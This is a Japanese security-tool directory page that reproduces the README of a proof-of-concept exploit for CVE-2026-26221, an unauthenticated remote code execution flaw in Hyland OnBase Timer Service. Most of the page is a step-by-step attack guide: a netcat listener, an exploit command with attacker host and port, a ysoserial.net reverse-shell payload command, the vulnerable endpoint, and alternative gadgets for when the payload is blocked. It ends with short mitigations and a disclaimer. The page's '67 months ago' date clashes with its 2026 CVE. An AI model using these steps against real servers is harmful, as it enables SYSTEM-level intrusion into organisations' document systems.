Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mbanyamer/cve-2026-26221-hyland-onbase-timer-service-unauthenticated-rce
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubmbanyamer/cve-2026-26221-hyland-onbase-timer-service-unauthenticated-rce

CVE-2026-26221-Hyland-OnBase-Timer-Service-Unauthenticated-RCE

Hyland OnBase Timer Serviceにおける、.NET Remoting BinaryFormatterの逆シリアル化を介した未認証のリモートコード実行の概念実証エクスプロイトであり、SYSTEM権限を達成します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
67ヶ月前未レビュー

📡 Hyland OnBase Timer Service 認証なしRCE

Mohammed Idrees Banyamer

セキュリティ研究者

ヨルダン 🇯🇴

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 概要

このリポジトリには、安全でない .NET Remoting BinaryFormatter デシリアライゼーション を介した Hyland OnBase Timer Service の認証なしリモートコード実行の脆弱性に対する Proof‑of‑Concept エクスプロイトが含まれています。

この脆弱性により、認証されていない攻撃者が細工した BinaryFormatter ペイロードを Timer Service エンドポイントに送信し、NT AUTHORITY\SYSTEM として任意のコードを実行できます。

  • 製品: Hyland OnBase Workflow / Workview Timer Service
  • ポート: 8900/TCP
  • 認証: 不要
  • 影響: リモートコード実行
  • 権限: SYSTEM
  • CVE: CVE‑2026‑26221
  • CVSS: 9.8(緊急)

⚙️ 技術詳細

Timer Service は .NET Remoting エンドポイントを公開しています:

root@kitploit:~
http://TARGET:8900/TimerServiceAPI.rem

このサービスは認証なしの BinaryFormatter オブジェクトを受け入れます。 悪意のあるガジェットチェーン(ysoserial.net)を供給することで、デシリアライゼーション中に任意のコマンド実行が発生します。


📦 要件

  • Python 3
  • requests
  • ysoserial.net
  • netcat リスナー
  • Windows ペイロード生成環境(Windows / Mono / Wine)

Python 依存関係のインストール:

root@kitploit:~
pip install requests

ysoserial.net のダウンロード:

root@kitploit:~
git clone https://github.com/pwntester/ysoserial.net

🚀 使用方法

1️⃣ リスナーの起動

root@kitploit:~
nc -lvnp 4444

2️⃣ エクスプロイトの実行

root@kitploit:~
python3 exploit.py 192.168.10.50 --lhost 192.168.1.100 --lport 4444

3️⃣ ペイロードの生成

スクリプトは ysoserial コマンドを出力します。 別のターミナル(Windows / Mono)で実行してください:

root@kitploit:~
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c "powershell ..." -o raw > rev_shell.bin

4️⃣ ペイロードの送信

ペイロード生成後、エクスプロイトターミナルで ENTER を押してください。

脆弱性がある場合 → リバースシェルが接続されます。


🧪 例

root@kitploit:~
python3 exploit.py 10.10.10.123 --lhost 192.168.5.77 --lport 9001

🔧 オプション


🧯 注意事項

  • エクスプロイトは ブラインド です

  • 成功 = リバースシェルのコールバック

  • サービスは SYSTEM として実行されます

  • ブロックされた場合は代替ガジェットを試してください:

    • TextFormattingRunProperties
    • ObjectDataProvider

🛡️ 緩和策

  • Hyland セキュリティアドバイザリ OB2025‑03 のパッチを適用
  • .NET Remoting の公開を無効化
  • ポート 8900 へのアクセスを制限
  • BinaryFormatter の使用を監視

📊 PoC 攻撃フロー

root@kitploit:~
sequenceDiagram
    participant A as Attacker
    participant Y as ysoserial.net
    participant T as Target OnBase Timer Service
    participant S as SYSTEM Shell

    A->>A: Start netcat listener
    A->>Y: Generate BinaryFormatter payload
    Y-->>A: rev_shell.bin
    A->>T: HTTP POST /TimerServiceAPI.rem
    T->>T: BinaryFormatter.Deserialize()
    T->>S: Execute gadget chain
    S-->>A: Reverse shell connection

⚠️ 免責事項

このエクスプロイトは以下を目的として提供されています:

  • セキュリティ研究
  • 許可された侵入テスト
  • 防御的検証

所有していない、またはテスト許可がないシステムに対する不正使用は違法です。


ツールをダウンロード
オプション説明
targetターゲット IP またはホスト名
--portTimer Service ポート(デフォルト 8900)
--endpointTimerServiceAPI.rem / TimerServiceEvents.rem
--lhost攻撃者 IP
--lportリスナーポート
--gadgetysoserial ガジェットチェーン